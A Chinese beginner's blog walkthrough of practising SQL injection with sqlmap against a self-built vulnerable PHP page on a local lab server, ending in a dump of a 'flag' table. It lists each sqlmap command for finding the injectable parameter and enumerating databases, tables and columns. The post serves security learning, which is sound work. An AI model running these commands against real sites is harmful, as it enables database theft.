sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据

sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第1张图片

sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。 [1] 它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用 SQL注入 漏洞的过程。 [2] 该软件在命令行运行,可以下载用于不同的操作系统: Linux 发行版, Windows 和 Mac OS 操作系统。 [3] 除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份,电话号码,电子邮件地址,信用卡以及其他机密和敏感信息。。 全面支持所有注入技术:布尔,错误,堆栈,时间,联合。 维基百科

准备工作:

1、背景交代:现在的网站架构越来越多,要想找到一个有着sql注入漏洞的网站练手。我这种小白,还是欠缺经验。倒不如自己搭建一个来得快,反正也是练练手。 2、利用xampp集成工具搭建一个练习环境,简单一点,只写两张页面,一张用来提交数据,一张用来后台处理数据,查询数据库得到结果。 3、相关代码文件已经上传github:https://github.com/yulele17/testsql 操作步骤: 1、检测是否存在注入点,确定注入点的位置:
sqlmap -u  'http://192.168.18.107/testsql/sqll.php?id=1'
sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第2张图片 发现注入点在参数id上 2、查看有哪些数据库:
sqlmap -u  'http://192.168.18.107/testsql/sqll.php?id=1' --dbs
sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第3张图片 发现了所有的数据库,共有9个。 3、查看当前数据库
sqlmap -u  'http://192.168.18.107/testsql/sqll.php?id=1' --current-db
sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第4张图片 得到当前的数据库名称为:testsql。 4、查看当前数据库下有哪些表
sqlmap -u  'http://192.168.18.107/testsql/sqll.php?id=1' -D testsql --tables
sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第5张图片 发现该数据库下只有两个表,其中user自然是存放用户的了。如果是参加比赛的话,一般会选择查看flag这个表(很明显的提示嘛)。 5、查看flag表有哪些列:
sqlmap -u 'http://192.168.18.107/testsql/sqll.php?id=1' -D testsql -T flag --columns
sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第6张图片 发现该表只有一列:flag且是varchar(100)类型的。 6、查看该表的内容:
sqlmap -u 'http://192.168.18.107/testsql/sqll.php?id=1' -D testsql -T flag -C flag --dump
只有一列,所以—C后只跟一个参数,如果是多列,用逗号隔开。 参数 --dump 将转储DBMS数据库条目。

sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第7张图片

得到该表的内容。 小白一个,不对之处,还请批评指正,大神轻喷。 sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第8张图片

sql注入 练手网站_简记——利用sqlmap检测网站sql注入漏洞获取数据_第9张图片

欢迎关注我的微信公众号:互联网小白

你可能感兴趣的:(sql注入,练手网站)